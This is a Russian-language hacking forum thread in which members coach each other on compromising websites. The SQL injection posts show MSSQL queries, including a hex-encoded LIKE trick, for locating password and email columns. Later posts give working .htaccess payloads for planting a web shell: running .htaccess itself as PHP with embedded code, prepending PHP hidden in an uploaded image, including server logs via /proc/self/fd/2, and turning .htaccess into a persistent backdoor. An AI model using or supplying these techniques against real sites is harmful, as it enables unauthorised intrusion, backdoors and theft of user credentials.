Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    Примерно так:
     
    _________________________
  2. w0rkX

    w0rkX New Member

    Joined:
    15 May 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    про LIKE в MSSQL никто не знает чтоли как правильно запрос составить? :confused:
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    Также как и в Мусукле, но нужно учитывать кодировки текста, которого ищешь, и текста, в котором ищешь. Они должны строго совпадать.
     
    _________________________
  4. w0rkX

    w0rkX New Member

    Joined:
    15 May 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    все правильно с кодировками
    пробовал в char email кодировать

    char(101)%2Bchar(109)%2Bchar(97)%2Bchar(105)%2Bchar(108)
    тоже без результата

    select top 1 table_name from information_schema.tables where table_name like '%email%'

    такой запрос в sql inj не будет работать!

    а вот так

    SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’

    говорит

    Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

    пробовал на разных инъекциях везде одно и тоже, как-то по другому видимо нужно

    проблема не в кодировке и такие колонки есть в базе юзера мсскл
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    Попробуй прохексить поисковое значение в like:

    select top 1 table_name from information_schema.tables where table_name like 0x25656D61696C25

    P.S: email скорее всего в вашем случае должен быть в column_name а не в table_name
     
    _________________________
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    есть еозможность чеерез админку редактировать htaccess, можно ли ккак-то алить шелл через него?
     
  7. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    А ничего больше заливать нельзя? Может проще в htaccess указать, чтобы пхп парсер проверял дополнительные файлы с нестандартным раширением (допустим картинок, которые очень часто в админках можно загружать).
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    он не заливается, а посто редактируется, я хотел прописать строчки чтобы он картинки как php обрабатывал, но мне мешает htaccess который лежит в каталоге с картинками
     
  9. bestoloch

    bestoloch New Member

    Joined:
    13 Sep 2012
    Messages:
    9
    Likes Received:
    3
    Reputations:
    10
    А можно попробовать создать еще одну папку и в нее свой .htaccess нужного содержания залить? или не вариант?
     
  10. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    529
    Likes Received:
    253
    Reputations:
    32
    а смысл,в ту папку надо будет еще залить наш шелл залить
    ибо хтаккес не в корневой дериктории
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    я кроме как редачиь htaccess и заливать картинки ничего не могу
     
  12. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    529
    Likes Received:
    253
    Reputations:
    32
    тогда копай в сторону кривого кода аплоадера картинок
    иначе никак
     
  13. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Да, разрешаешь в нем чтение .htaccess всем (или только себе),
    указываешь выполнять .htaccess как php скрипт,
    и тут же пишешь код.

    Сначала поэкспериментируй на локалхост.

    Код приводить не буду.
     
    2 people like this.
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - <?php ?> не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку
     
    #22214 Cennarios, 23 May 2013
    Last edited: 23 May 2013
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    такс, поексперементировал,

    PHP:
    <Files .htaccess>
    Allow from 100.247.115.100
    </Files>
    AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

    # <? echo "aaaa"; ?>
    файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог


    PHP:
    <Files .htaccess>
    Allow from 100.247.115.100
    </Files>
    php_value auto_prepend_file /home/domains/h.ru/public_html/phps.jpg
    а как мне его заставить выполнить код который в картинке?
     
    1 person likes this.
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108



    php_value или php_admin_value

    auto_prepend_file или auto_append_file

    Путь к картинке содержащей обрамленный php-тегами код: /home/domains/h.ru/public_html/phps.jpg

    Если в самом конфиге апача вышеуказанные директивы уже описаны, то переопределяться в .htaccess файлах не будут.


    P.S. Как итересная альтернатива коду в картинке можно попробовать приатачить лог перебором пути - /proc/self/fd/2 etc...
     
    #22216 Cennarios, 23 May 2013
    Last edited: 24 May 2013
  17. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Молодец, оба варианта правильные.
    Если на сервере команды не выполняются, значит нарушены условия http://php.net/manual/ru/configuration.changes.php
    Т.е. нужно, чтобы php запускался, как модуль Апача и разрешены AllowOverride All или AllowOverride Options.
     
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    <Files .htaccess>
    Allow from 100.247.115.100
    </Files>
    AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

    # <? echo "aaaa"; ?>


    Этот вариант неправильный. Вот тут - # <? echo "aaaa"; ?> решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла
     
  19. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Правильный, ты не понял фишку этого комментария :)
    Пробуй
    PHP:
    <FilesMatch "^\.">
    allow from all
    </FilesMatch>
    AddType application/x-httpd-php .htaccess
    #<?php phpinfo(); ?>
     
    #22219 nikp, 24 May 2013
    Last edited: 24 May 2013
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Где-то есть зависимость от базовых правил httpd.conf, так как на одном сервере заработало а на другом нет.

    P.S.
    натолкнуло на интересную мысль: Добавив DirectoryIndex .htaccess можно через теже non-GPC принимать данные на выполнение команд или кода в ракурсе бэкдора на сайте.

    P.S.
    Причем если php engine OFF или noexec то будет отдано как plain.
    Тогда вариант - shtml если настроено на сервере(предположение)
     
    #22220 Cennarios, 24 May 2013
    Last edited: 24 May 2013
Loading...
Thread Status:
Not open for further replies.